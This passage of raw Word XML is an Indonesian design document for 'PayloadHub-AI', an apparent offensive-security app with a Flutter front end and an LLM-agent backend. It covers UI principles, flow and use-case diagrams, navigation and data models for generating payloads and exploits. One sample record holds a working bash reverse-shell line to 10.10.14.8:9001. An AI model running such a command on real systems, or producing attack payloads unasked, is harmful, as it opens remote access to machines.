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TAHAP 2 — Perancangan Sistem dan Antarmuka</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proyek:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PayloadHub-AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Fokus tahap:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> alur aplikasi, kasus penggunaan, navigasi, model data, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>wireframe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>, dan purwarupa antarmuka.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Prinsip Perancangan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Rancangan mengikuti karakteristik pengguna pada Tahap 1: praktisi keamanan yang bekerja cepat, sering menggunakan satu tangan di ponsel, dan membutuhkan hasil yang dapat dibaca serta disalin.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Prinsip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Penerapan dalam rancangan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Kemudahan penggunaan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Maksimal 2 ketukan menuju fitur utama; aksi utama selalu berupa tombol besar di bawah formulir.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Konsistensi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Satu tema gelap, satu palet warna, satu pola kartu (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C270B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PanelCard</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>), satu pola tombol (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C270B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>FilledButton</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> aksen).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Keterbacaan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Hasil kode memakai </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>font monospace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SelectableText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i/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>line height</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1,45; kontras teks utama ≥ 4,5:1.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Umpan balik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Setiap aksi memberi respons: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>loading spinner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, SnackBar sukses/gagal, status kosong yang menjelaskan langkah berikutnya.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Pencegahan kesalahan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IPv4/port sebelum aksi; konfirmasi sebelum menghapus seluruh riwayat; peringatan otorisasi.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Efisiensi di ponsel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Navigasi bawah di area jempol; target sentuh ≥ 44 dp; kartu tersusun vertikal tanpa </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>horizontal scroll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Keamanan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sensitif tidak pernah ditampilkan penuh; API key disamarkan; riwayat disimpan terenkripsi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Palet warna (tema gelap):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Token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Hex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Penggunaan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#0D1117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Latar aplikasi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bgElevated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#161B22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Top bar, sidebar, input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card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#1F242D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Kartu/panel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border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#2E3644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Garis pemisah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accent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#50FA7B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Aksi utama, status aman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warning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#E3B341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Peringatan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danger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#F85149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Risiko tinggi, hapus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info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#58A6FF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Informasi/tautan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textPrimary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#E6EDF3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Teks utama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textSecondary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#8B949E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Teks sekunder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Tipografi: Roboto (bawaan Flutter) untuk UI, monospace untuk kode; ukuran judul 17 sp, isi 13–14 sp, metadata 10,5–12 sp.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2. Diagram Alur Aplikasi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>2.1 Alur pengguna utama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flowchart TD</w:t>
        <w:br/>
        <w:t xml:space="preserve">    A[Mulai aplikasi] --&gt; B[Auto-seed konfigurasi lokal]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    B --&gt; C[Dashboard]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    C --&gt; D{Pilih menu}</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    D --&gt;|Generator| E[Script Generator]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    E --&gt; F{Pilih tab}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    F --&gt;|One-Liner| G[Isi LHOST &amp; LPORT]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    G --&gt; H{Validasi IPv4/port}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    H --&gt;|Tidak valid| I[Tampilkan pesan error]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    I --&gt; G</w:t>
        <w:br/>
        <w:t xml:space="preserve">    H --&gt;|Valid| J[Bangun payload deterministik]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    J --&gt; K[Tampilkan blok kode + tombol salin]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    K --&gt; L[Simpan ke Riwayat lokal]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    L --&gt; M[SnackBar sukses]</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    F --&gt;|Python Builder| N[Isi target, port, path, tipe]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    N --&gt; O[POST /api/v1/agent/execute]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    O --&gt; P{Backend tersedia?}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P --&gt;|Tidak| Q[Tampilkan error jaringan]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P --&gt;|Ya| R[Tampilkan exploit.py]</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    D --&gt;|Exploit Library| S[Cari/filter exploit]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    S --&gt; T[Pilih exploit]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    T --&gt; U[Detail CVE + PoC]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    U --&gt; V[Send to Studio]</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    D --&gt;|Monitoring| W[Lihat telemetri &amp; log agent]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D --&gt;|Settings| X[Atur API key, LHOST/LPORT, tema]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    X --&gt; Y[Simpan ke secure storage]</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    C --&gt;|Ikon riwayat| Z[Riwayat Aktivitas]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Z --&gt; Z1[Lihat detail / salin / hapus / ekspor]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>2.2 Alur data saat memanggil agent AI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sequenceDiagram</w:t>
        <w:br/>
        <w:t xml:space="preserve">    autonumber</w:t>
        <w:br/>
        <w:t xml:space="preserve">    participant U as Pengguna</w:t>
        <w:br/>
        <w:t xml:space="preserve">    participant F as Flutter</w:t>
        <w:br/>
        <w:t xml:space="preserve">    participant A as FastAPI</w:t>
        <w:br/>
        <w:t xml:space="preserve">    participant L as LLM Agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">    participant T as Deterministic Tools</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    U-&gt;&gt;F: Isi prompt + konteks (target/scan)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    F-&gt;&gt;F: Validasi klien (IP/port)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    F-&gt;&gt;A: POST /api/v1/agent/execute</w:t>
        <w:br/>
        <w:t xml:space="preserve">    A-&gt;&gt;A: Validasi Pydantic + sanitasi</w:t>
        <w:br/>
        <w:t xml:space="preserve">    alt Input tidak valid</w:t>
        <w:br/>
        <w:t xml:space="preserve">        A--&gt;&gt;F: 400 ErrorResponse</w:t>
        <w:br/>
        <w:t xml:space="preserve">        F--&gt;&gt;U: Pesan validasi</w:t>
        <w:br/>
        <w:t xml:space="preserve">    else Input valid</w:t>
        <w:br/>
        <w:t xml:space="preserve">        A-&gt;&gt;L: Prompt + context + system guardrail</w:t>
        <w:br/>
        <w:t xml:space="preserve">        L-&gt;&gt;T: Pilih tool &amp; argumen</w:t>
        <w:br/>
        <w:t xml:space="preserve">        T--&gt;&gt;L: Hasil deterministik (payload/CVE/JWT)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        L--&gt;&gt;A: Jawaban final</w:t>
        <w:br/>
        <w:t xml:space="preserve">        A--&gt;&gt;F: 200 AgentResponse (code_blocks, tools_used)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        F-&gt;&gt;F: Parse blok kode</w:t>
        <w:br/>
        <w:t xml:space="preserve">        F--&gt;&gt;U: Render + tombol salin</w:t>
        <w:br/>
        <w:t xml:space="preserve">    end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3. Kasus Penggunaan (Use Case)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>3.1 Diagram use case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flowchart LR</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P((Pengguna))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    B((Backend Agent))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    V((VirusTotal API))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    E((ExploitDB))</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    P --&gt; UC01[UC-01 Melihat dashboard]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P --&gt; UC02[UC-02 Membuat one-liner payload]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P --&gt; UC03[UC-03 Membuat exploit Python]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P --&gt; UC04[UC-04 Mencari exploit]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P --&gt; UC05[UC-05 Mengirim exploit ke Studio]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P --&gt; UC06[UC-06 Mengatur konfigurasi aman]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P --&gt; UC07[UC-07 Mengelola riwayat]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P --&gt; UC08[UC-08 Memeriksa threat intelligence]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    UC02 --&gt; UC09[UC-09 Validasi masukan]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    UC03 --&gt; B</w:t>
        <w:br/>
        <w:t xml:space="preserve">    UC04 --&gt; E</w:t>
        <w:br/>
        <w:t xml:space="preserve">    UC08 --&gt; V</w:t>
        <w:br/>
        <w:t xml:space="preserve">    B --&gt; UC10[UC-10 Menjalankan tool deterministik]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>3.2 Skenario kasus penggunaan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Nama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Aktor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Prakondisi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Alur utama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Alur alternatif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1378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Pascar kondisi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UC-01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Melihat dashboard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Aplikasi terbuka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Pilih tab Home → kartu Studio, Nmap, Aktivitas, Library, Threat, Monitoring tampil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Layar lebar: tiga kolom; ponsel: satu kolom gulir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 memahami status dan dapat menuju fitur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UC-02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Membuat one-liner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Berada di Script Generator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Pilih kategori → pilih tipe → isi LHOST/LPORT → tekan Generate → payload tampil &amp; tersimpan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IP/port tidak valid → pesan error, payload tidak dibuat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Payload dapat disalin; entri riwayat bertambah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UC-03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Membuat exploit Python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Backend aktif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Isi target/port/path/tipe → Generate → backend agent memproses → kode tampil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Backend mati/timeout → pesan error; input kosong → validasi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Kode exploit tampil dan tercatat di riwayat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UC-04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Mencari exploit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Halaman Exploit Library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Ketik kata kunci → daftar terfilter → pilih item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hasil → status kosong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Detail CVE/PoC tampil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UC-05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Kirim ke Studio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Exploit dipilih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Tekan Send to Studio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Studio terisi, navigasi ke Dashboard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UC-06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Mengatur konfigurasi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Halaman Settings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Isi API key/LHOST/LPORT → Save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Validasi gagal → simpan dibatalkan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Nilai tersimpan terenkripsi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UC-07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Mengelola riwayat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Ada/belum ada entri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Buka Riwayat → pilih entri → salin/hapus/ekspor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Riwayat kosong → status kosong informatif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Perubahan persist setelah aplikasi dibuka ulang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UC-08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Pengguna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Halaman Dashboard/Threat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Masukkan indikator → periksa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Key belum diisi → pesan konfigurasi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Hasil reputasi tampil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UC-09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Validasi masukan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Sistem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Form dikirim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Periksa format IPv4/port/panjang teks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Tidak valid → blokir aksi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Hanya data valid yang diproses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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UC-10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Tool deterministik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Request valid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LLM memilih tool → tool menyusun keluaran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Tool gagal → error 500 terstruktur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1378"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Keluaran konsisten &amp; dapat diaudit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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4. Struktur Navigasi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>4.1 Peta navigasi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flowchart TD</w:t>
        <w:br/>
        <w:t xml:space="preserve">    R[PayloadHubApp] --&gt; SHELL[DashboardScreen shell]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SHELL --&gt;|layar &lt; 700 px| BOT[NavigationBar bawah]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SHELL --&gt;|layar &gt;= 700 px| SIDE[Sidebar kiri]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    BOT --&gt; P1[Dashboard]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    BOT --&gt; P2[Exploit Library]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    BOT --&gt; P3[Script Generator]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    BOT --&gt; P4[Monitoring]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    BOT --&gt; P5[Settings]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SIDE --&gt; P1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SIDE --&gt; P2</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SIDE --&gt; P3</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SIDE --&gt; P4</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SIDE --&gt; P5</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SIDE --&gt;|push| H[Riwayat Aktivitas]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    TOP[Top bar] --&gt;|push| H</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P1 --&gt;|panel| H</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P2 --&gt;|tap item di ponsel| D[Detail Exploit]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P1 --&gt; CHAT[Info Bot - overlay]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    P2 --&gt;|Send to Studio| P1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    H --&gt;|bottom sheet| HD[Detail Riwayat]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>4.2 Tabel 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Halaman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Jenis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Akses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 utama</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1930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Aksi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utama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nav/sidebar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StudioConfigPanel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NmapScansPanel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ActivityHistoryPanel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PayloadLibraryPanel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ThreatIntelPanel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MonitoringPanel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Isi konfigurasi, buka riwayat, ekspor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utama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nav/sidebar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Pencarian, daftar exploit, detail CVE/PoC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Cari, pilih, kirim ke Studio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utama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nav/sidebar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One-Liner &amp; Python Builder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Validasi, generate, salin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utama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nav/sidebar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Grafik CPU/RAM/jaringan, log agent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Muat ulang, bersihkan log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Tab utama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nav/sidebar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Kartu API, target default, LLM engine, toggle UI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Simpan, validasi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i/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pushed route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Top bar, sidebar, panel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Daftar entri, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>detail bottom sheet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Salin, hapus per entri, hapus semua, ekspor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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i/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pushed route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Tap item (ponsel)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Detail CVE, CVSS, PoC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1930"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Kirim ke Studio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola navigasi yang diterapkan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Persisten</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C270B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IndexedStack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mempertahankan state halaman setelah dikunjungi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Adaptif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C270B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>NavigationBar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> di ponsel, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C270B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AppSidebar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> di layar ≥ 700 px.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bertumpuk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: rute detail (riwayat, exploit) memakai </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C270B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Navigator.push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C270B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MaterialPageRoute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Sementara</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Info Bot dan detail riwayat memakai </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>overlay/bottom sheet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Kembali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: tombol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistem dan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C270B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AppBar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada rute bertumpuk.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5. Model Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>5.1 Model lokal (Flutter)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ActivityEntry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — riwayat aktivitas, disimpan sebagai array JSON di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C270B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>flutter_secure_storage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Tipe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Wajib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microsecondsSinceEpoch-kinds</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, unik dan terurut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kind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payload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exploit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scan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threat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chat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title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Ringkasan, mis. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C270B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Reverse Shell · bash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detail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Payload/kode lengkap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createdAt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ISO-8601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Waktu lokal pembuatan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/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{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "id": "1792483912000000-payload",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "kind": "payload",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "title": "Reverse Shell · bash",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "detail": "bash -i &gt;&amp; /dev/tcp/10.10.14.8/9001 0&gt;&amp;1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "createdAt": "2026-10-20T13:45:00.000"</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Konfigurasi pengguna</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (key-value, terenkripsi):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Key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Tipe nilai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api_openai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api_deepseek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api_gemini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api_shodan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api_virustotal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Kunci provider opsional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default_lhost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C270B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>default_lport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String / int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Nilai awal generator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backend_base_url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Alamat backend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llm_engine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deepseek</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> atau </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C270B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ollama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ui_glow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ui_terminal_font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ui_sound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Preferensi tampilan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array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 (maks. 40)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5.2 Model backend (Pydantic)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AgentContext</w:t>
        <w:br/>
        <w:t>├── lhost: IPv4?          (regex ketat)</w:t>
        <w:br/>
        <w:t>├── lport: 1..65535?</w:t>
        <w:br/>
        <w:t>├── target: string?       (sanitasi, maks. 255)</w:t>
        <w:br/>
        <w:t>├── target_os: linux|windows|unknown</w:t>
        <w:br/>
        <w:t>└── scan_data: string?    (sanitasi, maks. 20.000)</w:t>
        <w:br/>
        <w:br/>
        <w:t>AgentRequest</w:t>
        <w:br/>
        <w:t>├── prompt: 1..4000 char  (sanitasi karakter kontrol)</w:t>
        <w:br/>
        <w:t>├── session_id: UUID?</w:t>
        <w:br/>
        <w:t>└── context: AgentContext?</w:t>
        <w:br/>
        <w:br/>
        <w:t>AgentResponse</w:t>
        <w:br/>
        <w:t>├── status: "success"</w:t>
        <w:br/>
        <w:t>├── session_id: UUID</w:t>
        <w:br/>
        <w:t>├── response: string</w:t>
        <w:br/>
        <w:t>├── code_blocks: CodeBlock[]</w:t>
        <w:br/>
        <w:t>├── tools_used: string[]</w:t>
        <w:br/>
        <w:t>└── elapsed_ms: int</w:t>
        <w:br/>
        <w:br/>
        <w:t>ErrorResponse</w:t>
        <w:br/>
        <w:t>├── status: "error"</w:t>
        <w:br/>
        <w:t>└── detail: [{loc, msg, type}]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="142B45"/>
        </w:rPr>
        <w:t>5.3 Relasi data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erDiagram</w:t>
        <w:br/>
        <w:t xml:space="preserve">    USER ||--o{ ACTIVITY : memiliki</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ACTIVITY {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        string id PK</w:t>
        <w:br/>
        <w:t xml:space="preserve">        string kind</w:t>
        <w:br/>
        <w:t xml:space="preserve">        string title</w:t>
        <w:br/>
        <w:t xml:space="preserve">        string detail</w:t>
        <w:br/>
        <w:t xml:space="preserve">        datetime createdAt</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    USER ||--o{ SETTING : menyimpan</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SETTING {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        string key PK</w:t>
        <w:br/>
        <w:t xml:space="preserve">        string value</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    USER ||--o{ AGENT_SESSION : menjalankan</w:t>
        <w:br/>
        <w:t xml:space="preserve">    AGENT_SESSION {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        uuid sessionId PK</w:t>
        <w:br/>
        <w:t xml:space="preserve">        string prompt</w:t>
        <w:br/>
        <w:t xml:space="preserve">        datetime createdAt</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    AGENT_SESSION ||--o{ CODE_BLOCK : menghasilkan</w:t>
        <w:br/>
        <w:t xml:space="preserve">    CODE_BLOCK {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        string language</w:t>
        <w:br/>
        <w:t xml:space="preserve">        string code</w:t>
        <w:br/>
        <w:t xml:space="preserve">        string payloadType</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Catatan: relasi di atas adalah model konseptual. Pada MVP, </w:t>
      </w:r>
